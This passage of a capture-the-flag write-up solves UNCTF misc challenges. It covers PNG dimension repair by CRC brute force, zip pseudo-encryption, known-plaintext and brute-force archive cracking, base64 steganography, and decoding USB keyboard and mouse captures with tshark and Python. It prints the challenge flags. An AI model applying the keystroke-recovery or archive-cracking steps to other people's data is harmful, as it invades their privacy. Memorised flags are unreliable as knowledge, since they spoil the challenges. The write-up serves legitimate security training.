crc32key = struct.unpack('>I', fr[0x1d:0x21])[0]    # CRC stored in the file
# earlier version: crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
    width = bytearray(struct.pack('>i', w))
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        for x in range(4):
            data[x+4] = width[x]
            data[x+8] = height[x]
        crc32result = binascii.crc32(data) & 0xffffffff
        if crc32result == crc32key:
            print(width, height)
            # write a copy of the image with the recovered width and height
            newpic = bytearray(fr)
            for x in range(4):
                newpic[x+16] = width[x]
                newpic[x+20] = height[x]
            with open(file + '.png', 'wb') as fw:
                fw.write(newpic)
            sys.exit()

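Extracting gives flagisnothere.zip and flag.txt. The flag is fake at a glance, so we keep digging into flagisnothere.zip. After a few tries it turns out to be pseudo-encryption.
java -jar .\ZipCenOp.jar r .\flagisnothere.zip
Extracting gives pass.png and a password-protected flag.pptx.
This pass.png... hard to put into words! It took me back to the environmental science courses from before I changed majors: the chemical name is hexachlorocyclohexane, also known as 666, so I used 666 to decrypt flag.pptx, and it worked!
The PPT has five slides and I found no flag. Worth noting here is that word, excel and ppt files can be browsed as archives, so we change the extension to zip and extract, which turns up an image, thumbnail.jpeg. 010 and steganography tools got nowhere. I translated it, thumbnail means a preview image, and indeed the PPT's thumbnail differs from every slide. The focus then moved to how to extract the PPT's thumbnail, but I searched everywhere and found no way...
Then I suddenly remembered "text hiding", flipped to the fifth slide, and found it! It really was the purest kind of steganography...
I changed the font colour to red so it is a bit easier to see.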

UNCTF{y0u_F1nd_1t!}

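我小心海也绝非鳝类 (My Little Kokomi Is No Eel Either) - College of Modern Science and Technology, China Jiliang University

Look closely: what this Kokomi says is F#S<YIcHnAG;
After base92 decoding this gives flaginmd5
Dropping the file into 010 shows RUFTWUxTQg== at the tail
After base64 decoding this gives EASYLSB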

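贝斯家族的侵略 (Invasion of the Base Family) - China University of Geosciences (Wuhan)

A known-plaintext attack at a glance. Compress the hint with bandizip and feed it to ARCHPR for a known-plaintext attack. You can stop once the first round of key search finishes, then click OK and save the decrypted archive.
Opening flag shows a huge number of base-encoded strings; base64 steganography at a glance. Here is a hand-me-down script.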

# base64 steganography
import base64
def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res


def b64_stego_decode():
    file = open("flag.txt","rb")
    x = ''                                      # x is bin_str
    lines =  file.readlines()
    for line in lines:
        l = str(line, encoding = "utf-8")
        stego = l.replace('\n','')
        #print(stego)
        realtext = base64.b64decode(l)
        #print(realtext)
        realtext = str(base64.b64encode(realtext),encoding = "utf-8")
        #print(realtext)
        diff = get_diff(stego, realtext)        # diff is the binary difference between the stego string and the real string
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n*2)
        else:
            x += '0' * n*2
            
    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i+8],2):
            flag += chr(int(x[i:i+8],2))
        i += 8
    print(flag)

if __name__ == '__main__':
    b64_stego_decode()

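Drop the result into cyberchef and apply hex, then download it locally. There is a string Filename:Macro.mrd at the tail, so I went off to search for what on earth an mrd file is.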

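CatchJerry - Huazhong University of Science and Technology

A quick look in WireShark shows keyboard traffic and mouse traffic mixed together. First use
tshark -r 1.pcap -T json > 3.json
to export a json file, which shows that the relevant data is stored in usbhid.data.
Next, extract usbhid.data.
tshark -r 1.pcap -T fields -e usbhid.data | sed '/^\s*$/d' > usbdata.txt
Note that the pattern here filters out blank lines and other junk; otherwise all sorts of odd problems may occur. OK, now for the hand-me-down scripts! (My favourite episode~)
To keep the format uniform, first a script that adds colons~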

f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
    a=f.readline().strip()
    if a:
        if len(a)==8: # keyboard traffic has len=16, mouse traffic has len=8
            out=''
            for i in range(0,len(a),2):
                if i+2 != len(a):
                    out+=a[i]+a[i+1]+":"
                else:
                    out+=a[i]+a[i+1]
            fi.write(out)
            fi.write('\n')
    else:
        break

fi.close()

This gives the colon-separated output.
Next, a script that converts the mouse traffic.

nums = []
keys = open('out.txt','r')
f = open('xy.txt','w')
posx = 0
posy = 0
for line in keys:
    if len(line) != 12+12 :  # normally this is 12 characters, but the mouse traffic here is 24
        continue
    x = int(line[3:5],16)
    y = int(line[6:8],16)
    if x > 127 :
        x -= 256
    if y > 127 :
        y -= 256
    posx += x
    posy += y
    btn_flag = int(line[0:2],16)  # 1 for left , 2 for right , 0 for nothing
    if btn_flag == 1 : # 1 means the left button; try both 0 and 1 yourself and keep whichever gives a result
        f.write(str(posx))
        f.write(' ')
        f.write(str(posy))
        f.write('\n')

f.close()

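This gives the converted mouse coordinates.
Then open gnuplot and run plot "xy.txt" to plot the coordinates.
The plotted result comes out reversed, so drop it into Photoshop and flip it around a few times.
OK, next we handle the keyboard traffic. Here is the script! This one is for Python 2.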

mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }

nums = []
keys = open('out.txt')
for line in keys:
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
         continue
    nums.append(int(line[6:8],16))

keys.close()

output = ""
for n in nums:
    if n == 0 :
        continue
    if n in mappings:
        output += mappings[n]
    else:
        output += '[unknown]'

print 'output :\n' + output

This one is for Python 3.

normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass

for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass

print ('output :' + "".join(output))

This gives the converted keyboard output.
Putting the pieces together gives the final result~

UNCTF{TOM_AND_JERRY_BEST_FRIENDS}

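找得到我吗 (Can You Find Me) - Minnan Normal University

Open the archive and find word/document.xml, which holds the body text; reading it by eye turns up the flag right away.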

UNCTF{You_find_me!}

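zhiyin - People's Public Security University of China

Fix the archive's file header to 504B0304. Dropping zhiyin.png into 010 shows a string of Morse code at the tail; decoding it gives
_UNC7F!!!
Dropping lanqiu.jpg into 010 and looking around shows a jpg file header at the tail, reversed. A long stretch of English text in the middle also shows that it is reversed, so next we reverse the whole file.
Write a file-reversing script.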

f1 = open('./lanqiu.jpg','rb')
reverse = f1.read()
f1.close()

f2 = open('./data.jpg','wb')
f2.write(reverse[::-1])
f2.close()

(A little hater, are we)
This gives the image; OCR by eye gives Go_play
Joining the two password strings gives Go_play_UNC7F!!!

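In_the_Morse_Garden - Army Engineering University

Open the pdf attachment, press ctrl+a to select all, and some hidden junk text shows up; base64-decoding its contents gives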
依古比古玛卡巴卡玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 玛卡巴卡玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 玛卡巴卡依古比古依古比古依古比古 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡依古比古玛卡巴卡玛卡巴卡
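On analysis, it contains only 依古比古 and 玛卡巴卡
Given the challenge title, Morse code comes to mind; try both assignments when converting to 0 and 1.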
011 01 10 001101 01 10 001101 11 01 101 01 001101 1000 01 101 01 01 01 01 01 101011

UNCTF{WAN_AN_MAKA_BAKAAAAA!}

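峰回路转 (A Turn of Events) - Inner Mongolia Police Vocational College

The encrypted archive attachment contains two 4-byte txt files. Trying a CRC brute force yields the password P@SsW0RD. Extracting gives flag.bmp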

数独大挑战 (Sudoku Challenge) - Minnan Normal University

Brute-forcing the 6-digit numeric password with archpr gives 547312; use it to extract.

芝麻开门 (Open Sesame) - Guangdong Ocean University

base64-decoding a2V5MQ== gives key1

Q.E.D.